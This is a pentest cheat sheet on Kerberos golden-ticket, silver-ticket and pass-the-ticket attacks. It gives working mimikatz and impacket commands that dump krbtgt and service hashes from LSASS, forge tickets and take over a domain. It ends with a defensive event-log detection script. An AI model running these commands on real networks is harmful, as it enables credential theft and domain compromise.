# golden silver passing ticket

* **Silver ticket** is stealthier and more discreet; it is valid only for the targeted service
* **Golden ticket** works for any Kerberos service

**Description of terms:**

* **TGT:** ticket to a service account, issued by the KDC; it can only access that service.
* **KRBTGT:** service account in the KDC; it issues all TGTs. If we can impersonate this account and create a golden ticket, we have the ability to create a service ticket for any service.

## Golden Ticket

### using mimikatz

```bash
# dump hash and SID
lsadump::lsa /inject /name:krbtgt

# create golden ticket
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500

# open a new elevated command prompt with the given ticket in mimikatz.
misc::cmd
```

### using impacket

```bash
impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid DOMAIN_SID -domain FQDN_DOMAIN USERNAME
# ticketer saves the ticket as USERNAME.ccache in the current directory
export KRB5CCNAME=USERNAME.ccache
impacket-psexec DOMAIN/USER@DOMAIN -k -no-pass
# can try impacket-secretsdump
```

## Silver Ticket

### mimikatz

```bash
# dump hash and SID
lsadump::lsa /inject /name:[<domain-admin-account> | <service-account>]

# create silver ticket
kerberos::golden /user:<USER> /domain:DOMAIN /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103
misc::cmd
```

## Pass-the-ticket

* Can be used for dumping user credentials inside an AD network
* Can dump the TGT from LSASS memory (LSASS stores Kerberos tickets and acts as the gatekeeper that accepts or rejects the credentials provided)
* Gives a .kirbi ticket - can be used to get domain admin
* Allows escalation to domain admin if you dump a domain admin's ticket and then impersonate that ticket

### using mimikatz

```bash
# exports all .kirbi to current directory
sekurlsa::tickets /export

# find some admin .kirbi from krbtgt
kerberos::ptt TICKET

# to check if the ticket is working (run from a command prompt, not inside mimikatz)
klist
```
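A defender-side check for the golden-ticket and pass-the-ticket techniques above, added here as an example (it is not part of the original notes): it flags service-ticket requests (event 4769) that are not backed by a TGT the domain controller issued to the same account and host (4768/4770). The tuple layout, account names, addresses and the 10-hour lifetime are assumptions; the sample events are constructed.

```python
from datetime import datetime, timedelta

# Assumption: domain policy keeps the default 10-hour maximum TGT lifetime.
TGT_LIFETIME = timedelta(hours=10)

# Constructed sample, simplified from DC Security events:
# (time, event id, account, client IP, service). 4768 = TGT issued,
# 4770 = ticket renewed, 4769 = service ticket requested.
SAMPLE_EVENTS = [
    ("2024-05-01T08:00:00", 4768, "alice", "::ffff:10.0.0.21", "krbtgt"),
    ("2024-05-01T08:01:00", 4769, "alice@CORP.LOCAL", "::ffff:10.0.0.21", "cifs/fs01"),
    ("2024-05-01T09:30:00", 4769, "Administrator@CORP.LOCAL", "::ffff:10.0.0.66", "cifs/dc01"),
    ("2024-05-01T09:45:00", 4769, "alice@CORP.LOCAL", "::ffff:10.0.0.66", "host/dc01"),
    ("2024-05-01T19:00:00", 4769, "alice@CORP.LOCAL", "::ffff:10.0.0.21", "cifs/fs01"),
]


def normalize(account, ip):
    """4769 logs user@REALM and IPv4-mapped addresses; reduce both to a join key."""
    return account.split("@")[0].lower(), ip.replace("::ffff:", "")


def find_unbacked_service_requests(events):
    """Return 4769 requests with no valid TGT issued to the same account and host."""
    issued = {}  # (account, ip) -> time of the last 4768/4770
    findings = []
    for ts, event_id, account, ip, service in sorted(events):
        when = datetime.fromisoformat(ts)
        user, host = normalize(account, ip)
        if event_id in (4768, 4770):
            issued[(user, host)] = when
            continue
        if event_id != 4769:
            continue
        last = issued.get((user, host))
        if last is not None and when - last <= TGT_LIFETIME:
            continue  # backed by a TGT the DC issued to this host
        elsewhere = any(u == user and h != host and when - t <= TGT_LIFETIME
                        for (u, h), t in issued.items())
        if elsewhere:
            reason = "tgt-issued-to-other-host"  # consistent with pass-the-ticket
        elif last is not None:
            reason = "tgt-expired"  # ticket used beyond the policy lifetime
        else:
            reason = "no-tgt-on-record"  # consistent with a forged TGT
        findings.append((ts, user, host, service, reason))
    return findings
```

A silver ticket is presented straight to the target service and never reaches the KDC, so this check does not see it. The correlation also needs events from every domain controller, otherwise a TGT issued by another DC shows up as a false positive.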

